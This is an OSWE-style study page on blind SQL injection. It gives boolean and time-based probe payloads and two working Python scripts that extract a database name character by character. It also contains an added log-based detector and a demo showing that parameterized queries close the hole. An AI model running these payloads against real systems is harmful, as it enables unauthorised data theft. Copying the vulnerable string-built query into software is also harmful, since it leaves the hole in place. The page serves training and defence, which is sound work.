OSWE Everything

Blind SQL Injection

Exploiting Blind SQL Injection

Many modern applications do not return full error messages to the end user. This makes SQL Injection harder to exploit, since the attacker cannot see the outcome of the injected queries directly. Extracting data from such an injection therefore has to be automated, either with custom scripts or with SQLMap.

Extracting data through Blind SQL Injection

Since we cannot read the query output directly, the extraction approach depends on the type of Blind SQL Injection we are dealing with.

Boolean based

When it comes to boolean based SQL Injection, the first thing you should do is observe how the response differs depending on the outcome of the following commands:

' AND 1=1 -- # true
' AND 1=0 -- # false

The difference between these two responses is what the script will later use to tell a true condition from a false one.

The next step is extracting information. You can extract data from the database using conditions like:

' AND ASCII(SUBSTRING((SELECT database()), 1, 1)) > 64 -- 

This checks whether the ASCII value of the first character of the database name is greater than 64, i.e. whether it is 'A' (65) or a later character.

Time based

Time based SQL Injection is harder to exploit, since the attacker has to wait at least one second for every single result, which adds up to a large difference when extracting big chunks of data.

First confirm that the vulnerability exists (the SLEEP function differs depending on the underlying database):

' OR SLEEP(5) --

Sample extraction of the database name:

' OR IF(SUBSTRING((SELECT DATABASE()), 1, 1) = 't', SLEEP(5), 0) -- 

This checks whether the database name starts with the letter t. If the condition is true, the application sleeps for 5 seconds.
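
From the defender's side, both subtypes above leave a recognisable trail in the web server access log: pairs of tautology probes (AND 1=1 / AND 1=0), character-by-character ASCII(SUBSTRING(...)) conditions, and SLEEP() calls that coincide with unusually slow responses. The following detector is an added example and not part of the original notes; it assumes a combined-log-style format with the response time in milliseconds appended as the last field (a constructed layout, adjust the regex to your server), and the indicator names and sample log lines are this example's own.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample access log: one normal client (10.0.0.5), one boolean-based
# prober (10.0.0.9) and one time-based prober (10.0.0.7). Last field = response ms.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2024:10:01:01 +0000] "GET /login?username=admin&password=x HTTP/1.1" 200 512 120
10.0.0.9 - - [12/Mar/2024:10:01:02 +0000] "GET /login?username=%27+AND+1%3D1+--+&password=x HTTP/1.1" 200 512 118
10.0.0.9 - - [12/Mar/2024:10:01:03 +0000] "GET /login?username=%27+AND+1%3D0+--+&password=x HTTP/1.1" 200 301 117
10.0.0.9 - - [12/Mar/2024:10:01:04 +0000] "GET /login?username=%27+AND+ASCII%28SUBSTRING%28%28SELECT+database%28%29%29%2C1%2C1%29%29%3E64+--+&password=x HTTP/1.1" 200 512 119
10.0.0.7 - - [12/Mar/2024:10:01:05 +0000] "GET /login?username=%27+OR+SLEEP%285%29+--+&password=x HTTP/1.1" 200 301 5021
10.0.0.7 - - [12/Mar/2024:10:01:11 +0000] "GET /login?username=%27+OR+IF%28SUBSTRING%28%28SELECT+DATABASE%28%29%29%2C1%2C1%29%3D%27t%27%2CSLEEP%285%29%2C0%29+--+&password=x HTTP/1.1" 200 301 5019
10.0.0.5 - - [12/Mar/2024:10:01:12 +0000] "GET /search?q=sleep+well HTTP/1.1" 200 900 95
"""

# Assumed log layout: combined log format plus response time (ms) as the final field.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\d+) (?P<ms>\d+)$'
)

# Indicators for the probe shapes discussed above, matched against the URL-decoded
# request target. The names are this example's own labels.
INDICATORS = {
    "boolean-tautology": re.compile(r"'\s*(?:AND|OR)\s+\d+\s*=\s*\d+", re.I),
    "char-extraction": re.compile(r"ASCII\s*\(\s*SUBSTR|SUBSTR(?:ING)?\s*\(\s*\(?\s*SELECT", re.I),
    "time-delay": re.compile(r"SLEEP\s*\(\s*\d+|BENCHMARK\s*\(|WAITFOR\s+DELAY|PG_SLEEP\s*\(", re.I),
}

SLOW_MS = 1000  # a delay probe whose response really was slow is the strongest signal


def parse_line(line):
    """Parse one log line into a dict, or return None if it does not match the layout."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ms"] = int(rec["ms"])
    rec["decoded"] = unquote_plus(rec["target"])
    return rec


def classify(decoded_target):
    """Return the names of all indicators that fire on one decoded request target."""
    return [name for name, rx in INDICATORS.items() if rx.search(decoded_target)]


def analyze(log_text):
    """Aggregate indicator hits per client IP; count delay probes that actually ran slow."""
    per_ip = defaultdict(lambda: {"hits": 0, "indicators": set(), "confirmed_time_based": 0})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        tags = classify(rec["decoded"])
        if not tags:
            continue
        entry = per_ip[rec["ip"]]
        entry["hits"] += 1
        entry["indicators"].update(tags)
        if "time-delay" in tags and rec["ms"] >= SLOW_MS:
            entry["confirmed_time_based"] += 1
    return dict(per_ip)


if __name__ == "__main__":
    for ip, info in analyze(SAMPLE_LOG).items():
        print(ip, info["hits"], sorted(info["indicators"]), info["confirmed_time_based"])
```

The per-client aggregation matters more than any single match: one tautology in isolation may be a false positive, but a client that sends a true/false pair followed by dozens of SUBSTRING conditions, or whose SLEEP() requests each take several seconds, is running exactly the extraction loop described on this page. Note that "sleep well" in the last sample line is deliberately not flagged, because the pattern requires the function-call parenthesis.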

Writing a script

Now that we know the logic behind exploiting this type of vulnerability, we can write a script for each of the two subtypes of Blind SQL Injection.

Time based

import requests
import time

url = "http://example.com/vulnerable_page"
output = ""

# Extract the database name character by character
for position in range(1, 21):  # Assuming the name is at most 20 characters
    for ascii_code in range(32, 127):  # Printable ASCII range
        payload = f"' OR IF(ASCII(SUBSTRING((SELECT database()), {position}, 1)) = {ascii_code}, SLEEP(5), 0) -- "
        params = {"username": payload, "password": "password123"}  # Adjust parameters as needed

        # Measure the response time; a delay of about 5 seconds means the condition was true
        start_time = time.time()
        response = requests.get(url, params=params, timeout=30)
        elapsed_time = time.time() - start_time

        if elapsed_time > 5:  # Adjust threshold if needed (network latency adds to the delay)
            output += chr(ascii_code)
            print(f"Found character: {chr(ascii_code)}")
            break
    else:
        # No character matched at this position: SUBSTRING past the end returns '' (ASCII 0),
        # so the name is shorter than 20 characters and we can stop
        break

print(f"Database name: {output}")

Boolean based

import requests

url = "http://example.com/vulnerable_page"
output = ""

# Extract the database name character by character
for position in range(1, 21):  # Assuming the name is at most 20 characters
    for ascii_code in range(32, 127):  # Printable ASCII range
        payload = f"' AND ASCII(SUBSTRING((SELECT database()), {position}, 1)) = {ascii_code} -- "
        params = {"username": payload, "password": "password123"}  # Adjust parameters as needed

        # Send the request
        response = requests.get(url, params=params, timeout=30)

        # Check the response behaviour (e.g. content length or a keyword) that differs
        # between the ' AND 1=1 and ' AND 1=0 probes
        if "Welcome" in response.text:  # Adjust based on true/false response
            output += chr(ascii_code)
            print(f"Found character: {chr(ascii_code)}")
            break
    else:
        # No character matched at this position: the name is shorter than 20 characters
        break

print(f"Database name: {output}")
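
Both scripts above depend on one property of the target: the ' AND 1=1 and ' AND 1=0 probes produce different responses. The following added example (not part of the original notes) shows the query shape that creates this boolean oracle next to its parameterized replacement, and wraps the probe pair in a check that can run as a regression test against the data-access layer. It uses a constructed in-memory SQLite database, so the SLEEP()-based variant is not shown, but the boolean oracle disappears for the same reason in every database: with bound parameters the input is only ever a string value, never SQL.

```python
import sqlite3


def make_db():
    """Constructed in-memory database with a single user row."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users (username, password) VALUES ('admin', 's3cret')")
    conn.commit()
    return conn


def lookup_vulnerable(conn, username, password):
    """String-built query: the attacker's input becomes part of the SQL text."""
    sql = f"SELECT id FROM users WHERE username = '{username}' AND password = '{password}'"
    return conn.execute(sql).fetchone()


def lookup_parameterized(conn, username, password):
    """Bound parameters: the same two inputs are passed as values, not as SQL."""
    sql = "SELECT id FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()


# The probe pair from this page, prefixed with a real username so that the
# injected condition alone decides whether the row comes back.
TRUE_PROBE = "admin' AND 1=1 -- "
FALSE_PROBE = "admin' AND 1=0 -- "


def has_boolean_oracle(conn, lookup):
    """Regression check: True if the true/false probe pair yields different results,
    i.e. the lookup function can be used as a boolean oracle."""
    return lookup(conn, TRUE_PROBE, "wrong") != lookup(conn, FALSE_PROBE, "wrong")


if __name__ == "__main__":
    conn = make_db()
    print("vulnerable lookup exposes oracle:", has_boolean_oracle(conn, lookup_vulnerable))
    print("parameterized lookup exposes oracle:", has_boolean_oracle(conn, lookup_parameterized))
    # Legitimate input containing a quote still works with parameters
    print("o'brien lookup:", lookup_parameterized(conn, "o'brien", "x"))
```

With the string-built query the TRUE_PROBE returns the admin row (the trailing -- comments out the password check) while the FALSE_PROBE returns nothing, which is precisely the difference the boolean-based script measures. With bound parameters both probes return nothing, because no user is literally named "admin' AND 1=1 -- ", and a legitimate username containing a quote is handled without any escaping in application code.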


Last updated 5 months ago